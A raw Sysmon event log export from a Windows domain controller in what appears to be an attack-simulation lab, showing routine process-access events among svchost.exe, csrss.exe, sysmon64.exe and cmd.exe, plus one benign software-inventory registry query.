13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.542{59A5CD1D-8E83-6005-8700-00000000A301}43284308C:\Windows\system32\cmd.exe{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.549{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-1400-00000000A301}13042544C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E83-6005-8800-00000000A301}43044344C:\Windows\system32\conhost.exe{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8800-00000000A301}4304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:22.746{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
